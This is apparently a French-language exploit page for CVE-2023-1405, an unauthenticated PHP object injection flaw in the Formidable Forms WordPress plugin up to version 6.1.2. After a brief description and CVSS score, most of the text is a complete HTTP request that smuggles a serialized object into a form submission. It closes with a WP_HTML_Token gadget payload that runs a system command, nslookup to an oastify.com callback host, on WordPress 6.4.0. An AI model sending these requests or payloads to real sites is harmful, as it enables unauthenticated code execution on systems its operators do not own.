
Formidable Forms <= 6.1.2 - Injection d'objets PHP non authentifiée
Formidable Forms <= 6.1.2 - Injection d'objet PHP non authentifiée
Le plugin Formidable Forms pour WordPress est vulnérable à une injection d'objet PHP dans les versions jusqu'à la version 6.1.2 incluse, via la désérialisation d'une entrée non fiable provenant des soumissions de formulaire. Cela permet à des attaquants non authentifiés d'injecter un objet PHP. Aucune chaîne POP n'est présente dans le plugin vulnérable. Si une chaîne POP est présente via un plugin ou thème supplémentaire installé sur le système cible, cela pourrait permettre à l'attaquant de supprimer des fichiers arbitraires, de récupérer des données sensibles ou d'exécuter du code.
Type: plugin
CVSS Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2023-1405
POST /wp-admin/admin-ajax.php?action=frm_forms_preview&form=contact-form HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin-ajax.php?action=frm_forms_preview&form=contact-form
Content-Type: multipart/form-data; boundary=---------------------------343242131629515258773021267392
Content-Length: 1871
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0, i
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_action"
create
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="form_id"
1
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_hide_fields_1"
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="form_key"
contact-form
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[0]"
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_submit_entry_1"
5dc418e798
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/admin-ajax.php?action=frm_forms_preview&form=contact-form
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[1]"
test
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[2]"
teasads
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[3]"
[email protected]
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[4]"
teasdsda
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[5]"
O:20:"PHP_Object_Injection":0:{}
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_key"
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_verify"
-----------------------------343242131629515258773021267392--
Vous pouvez également utiliser ce payload O:13:"WP_HTML_Token":2:{s:13:"bookmark_name";s:53:"nslookup jj603shxad7lmfb20joe5vrjva11pudj.oastify.com";s:10:"on_destroy";s:6:"system";} pour Wordpres 6.4.0